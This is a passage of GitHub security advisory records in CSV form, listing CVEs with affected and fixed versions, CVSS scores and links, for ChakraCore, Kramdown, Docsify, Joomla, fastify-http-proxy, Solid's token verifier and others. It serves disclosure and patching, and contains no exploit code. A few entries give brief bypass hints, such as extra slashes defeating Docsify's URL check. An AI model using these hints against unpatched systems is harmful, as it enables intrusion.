+1.4.0,GHSA-mg98-x2cm-4cpf,2021-03-18T22:36:54Z,2021-03-29T20:59:15Z,,['CVE-2019-1106'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1092, CVE-2019-1103, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1106'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/362e96537af207be3ecf7fa32f338229ee1dcc46'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1106'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:36:54Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}" +1.4.0,GHSA-p44j-xrqg-4xrr,2021-03-08T21:06:09Z,2021-03-08T21:06:23Z,,['CVE-2021-21337'],URL Redirection to Untrusted Site ('Open Redirect') in Products.PluggableAuthService,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +Open redirect vulnerability - a maliciously crafted link to the login form and login functionality could redirect the browser to a different website. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +The problem has been fixed in version 2.6.1. Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to `2.6.1` and re-run the buildout, or if you used `pip` simply do `pip install ""Products.PluggableAuthService>=2.6.1""` + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +There is no workaround. Users are encouraged to upgrade. + +### References +_Are there any links users can visit to find out more?_ + +- [GHSA-p44j-xrqg-4xrr](https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr) +- [Products.PluggableAuthService on PyPI](https://pypi.org/project/Products.PluggableAuthService/) +- [OWASP page on open redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Products.PluggableAuthService issue tracker](https://github.com/zopefoundation/Products.PluggableAuthService/issues) +* Email us at [security@plone.org](mailto:security@plone.org)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21337'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/commit/7eead067898852ebd3e0f143bc51295928528dfa'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.PluggableAuthService/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162911/Products.PluggableAuthService-2.6.0-Open-Redirect.html'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T21:06:09Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}" +1.4.0,GHSA-52p9-v744-mwjj,2021-03-31T20:25:55Z,2021-03-29T16:30:34Z,,['CVE-2021-28834'],Remote code execution in Kramdown,"Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters namespace, and thus arbitrary classes can be instantiated.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'kramdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28834'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/pull/708'}, {'type': 'WEB', 'url': 'https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760'}, {'type': 'WEB', 'url': 'https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2'}, {'type': 'WEB', 'url': 'https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/compare/REL_2_3_0...REL_2_3_1'}, {'type': 'WEB', 'url': 'https://gitlab.com/gitlab-org/gitlab/-/commit/179329b5c3c118924fb242dc449d06b4ed6ccb66'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJCJVYHPY6LNUFM6LYZIAUIYOMVT5QGV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3BBLUIDCUUR3NEE4NJLOCCAV3ALQ3O6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYOLQKFL6IJCQLBXV34Z4TI4O54GESPR/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4890'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T20:16:56Z', 'nvd_published_at': '2021-03-19T07:15:00Z'}" +1.4.0,GHSA-2rfj-2mwp-787v,2021-03-22T22:38:37Z,2021-03-29T20:57:51Z,,['CVE-2019-0993'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0992, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0993'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/36644ee0d4cc2bc97a3cd49c3540e6eea193182a'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0993'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:38:37Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}" +1.4.0,GHSA-vgwr-773q-7j3c,2021-03-24T17:57:48Z,2021-03-24T17:58:13Z,,['CVE-2021-26028'],Path Traversal within joomla/archive zip class,An issue was discovered in Joomla! 3.0.0 through 3.9.24. Extracting an specifilcy crafted zip package could write files outside of the intended path.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'joomla/archive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26028'}, {'type': 'WEB', 'url': 'https://github.com/joomla-framework/archive/commit/32c9009a1020d16bc1060c0d06339898b697cf2c'}, {'type': 'WEB', 'url': 'https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/joomla/archive/CVE-2021-26028.yaml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T17:57:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-2h3h-vw8r-82rp,2021-07-22T15:58:18Z,2021-03-26T16:49:26Z,,['CVE-2021-27884'],Weak JSON Web Token in yapi-vendor,Weak JSON Web Token (JWT) signing secret generation in YMFE YApi through 1.9.2 allows recreation of other users' JWT tokens. This occurs because Math.random in Node.js is used as a source of randomness in jwt signing. Math.random does not provide cryptographically secure random numbers. This has been patched in version 1.9.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'yapi-vendor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.9.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27884'}, {'type': 'WEB', 'url': 'https://github.com/YMFE/yapi/issues/2117'}, {'type': 'WEB', 'url': 'https://github.com/YMFE/yapi/issues/2263'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-228-YMFE-yapi'}]","{'cwe_ids': ['CWE-330'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T16:48:44Z', 'nvd_published_at': '2021-03-01T23:15:00Z'}" +1.4.0,GHSA-h77r-rp97-7rv4,2021-10-20T17:37:39Z,2021-03-29T20:43:01Z,,['CVE-2020-25699'],Privilage Escalation in moodle,"In moodle, insufficient capability checks could lead to users with the ability to course restore adding additional capabilities to roles within that course. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5, 3.7 to 3.7.8, 3.5 to 3.5.14 and earlier unsupported versions. This is fixed in moodle 3.9.3, 3.8.6, 3.7.9, 3.5.15, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25699'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/b8e1eec4c77c858de87fedf4e405e929539ea0c5'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895425'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413936'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:15:54Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}" +1.4.0,GHSA-758c-g2ff-9444,2021-03-22T22:37:00Z,2021-03-29T20:57:49Z,,['CVE-2019-1140'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1140'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1140'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:37:00Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}" +1.4.0,GHSA-prxj-c66c-4gcf,2021-03-18T22:02:15Z,2021-03-29T21:00:12Z,,['CVE-2019-0924'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0924'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6615113a09c0618ecc10e5680ffb978bf665641f'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0924'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:02:15Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-2mm9-c2fx-c7m4,2023-09-13T20:21:27Z,2021-03-01T19:44:27Z,,['CVE-2021-23342'],Docsify XSS Vulnerability,"This affects the package docsify before 4.12.0. It is possible to bypass the remediation done by CVE-2020-7680 and execute malicious JavaScript through the following methods 1) When parsing HTML from remote URLs, the HTML code on the main page is sanitized, but this sanitization is not taking place in the sidebar. 2) The isURL external check can be bypassed by inserting more `////` characters","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'docsify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23342'}, {'type': 'WEB', 'url': 'https://github.com/docsifyjs/docsify/commit/ff2a66f12752471277fe81a64ad6c4b2c08111fe'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1076593'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCSIFY-1066017'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/docsify'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161495/docsify-4.11.6-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/Feb/71'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T07:31:57Z', 'nvd_published_at': '2021-02-19T17:15:00Z'}" +1.4.0,GHSA-c4qr-gmr9-v23w,2021-03-02T03:32:25Z,2021-03-03T02:18:08Z,,['CVE-2021-21322'],Prefix escape,"### Impact + +By crafting a specific URL, it is possible to escape the prefix of the proxied backend service. +If the base url of the proxied server is `/pub/`, a user expect that accessing `/priv` on the target service would not be possible. Unfortunately, it is. + +[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N) + +### Patches + +All releases after v4.3.1 include the fix. + +### Workarounds + +There are no workaround available. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [fastify-reply-from](https://github.com/fastify/fastify-reply-from) +* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-http-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-http-proxy/security/advisories/GHSA-c4qr-gmr9-v23w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21322'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-http-proxy/commit/02d9b43c770aa16bc44470edecfaeb7c17985016'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/fastify-http-proxy'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T03:32:25Z', 'nvd_published_at': '2021-03-02T04:15:00Z'}" +1.4.0,GHSA-xmh9-rg6f-j3mr,2021-03-10T04:01:48Z,2021-03-12T22:39:01Z,,[],Verification flaw in Solid identity-token-verifier,"### Impact +#### Severity +Any Pod on a Solid server using a vulnerable version of the identity-token-verifier library is at risk of a spoofed Demonstration of Proof-of-Possession (DPoP) token binding. This vulnerability could give total and complete access to a targeted Pod. + +#### Summary +A verification flaw in the implementation of the identity token verifier library (https://github.com/solid/identity-token-verifier) allows DPoP proofs to be spoofed. + +DPoP proofs are used to bind access tokens to a private key meant to be in sole possession of a specific user. Instead of verifying against the hash of an embedded public key, the library instead verifies against a field that an attacker can modify to spoof another user’s DPoP. + +A stolen DPoP proof, when used in the right context, therefore allows the rebinding of a DPoP-bound access token. Any attacker in possession of a targeted access token could build an attack environment to replay it on any Pod service with this vulnerability. + + +### Patches +A new version 0.5.2 of identity-token-verifier fixes the verification: https://github.com/solid/identity-token-verifier/blob/7e18d86d65ee681e8ae912b6a032a1bae3cae570/src/lib/DPoP.ts#L25-L35 + +### Workarounds +None + +### References +_Are there any links users can visit to find out more?_ + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [identity-token-verifier](https://github.com/solid/identity-token-verifier/) repository. +* Email: info@solidproject.org",[],"[{'package': {'ecosystem': 'npm', 'name': '@solid/identity-token-verifier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/security/advisories/GHSA-xmh9-rg6f-j3mr'}, {'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/commit/fbdeb4aa8c12694b3744cd0454acb826817d9e6c'}, {'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/releases/tag/0.5.2'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@solid/identity-token-verifier'}]","{'cwe_ids': ['CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T04:01:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-h6wf-hvwc-fm77,2021-03-18T21:28:46Z,2021-03-29T21:00:02Z,,['CVE-2019-0914'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0914'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0914'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:28:46Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-7r28-3m3f-r2pr,2023-08-15T22:24:00Z,2021-03-19T21:25:50Z,,['CVE-2021-28092'],Regular Expression Denial of Service (ReDoS),"The is-svg package 2.1.0 through 4.2.1 for Node.js uses a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-svg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '4.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28092'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/commit/01f8a087fab8a69c3ac9085fbb16035907ab6a5b'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/releases'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/releases/tag/v4.2.2'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0008/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/is-svg'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:19:52Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}" +1.4.0,GHSA-57f3-gghm-9mhc,2023-09-08T20:22:14Z,2021-03-12T21:28:46Z,,['CVE-2021-23353'],jspdf vulnerable to Regular Expression Denial of Service (ReDoS),This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jspdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23353'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/pull/3091'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/commit/d8bb3b39efcd129994f7a3b01b632164144ec43e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1083289'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1083287'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-1083288'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1083286'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSPDF-1073626'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:11:28Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}" +1.4.0,GHSA-p6p8-q4pj-f74m,2021-03-19T19:21:49Z,2021-03-29T16:28:42Z,,['CVE-2020-24392'],Improper Certificate Validation in twitter-stream,"In voloko twitter-stream 0.1.16, missing TLS hostname validation allows an attacker to perform a man-in-the-middle attack against users of the library (because eventmachine is misused).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'twitter-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24392'}, {'type': 'WEB', 'url': 'https://github.com/voloko/twitter-stream'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-097-voloko-twitter-stream'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T19:21:49Z', 'nvd_published_at': '2021-02-19T23:15:00Z'}" +1.4.0,GHSA-9qw8-ccq9-ffj9,2021-03-22T22:45:46Z,2021-03-29T20:57:53Z,,['CVE-2019-1139'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1140, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1139'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/ae8a8d9644e677a9878e5dd7824d4b876454e799'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1139'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:45:46Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}" +1.4.0,GHSA-grvw-q343-58wh,2021-03-23T15:15:58Z,2021-03-29T20:55:57Z,,['CVE-2019-1300'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1300'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/95b3e3400afb8fa20743657f3a8057fb451e6f69'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1300'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:15:58Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}" +1.4.0,GHSA-jq4v-f5q6-mjqq,2023-09-05T14:33:14Z,2021-03-22T16:53:53Z,,['CVE-2021-28957'],lxml vulnerable to Cross-Site Scripting ,"An XSS vulnerability was discovered in the python 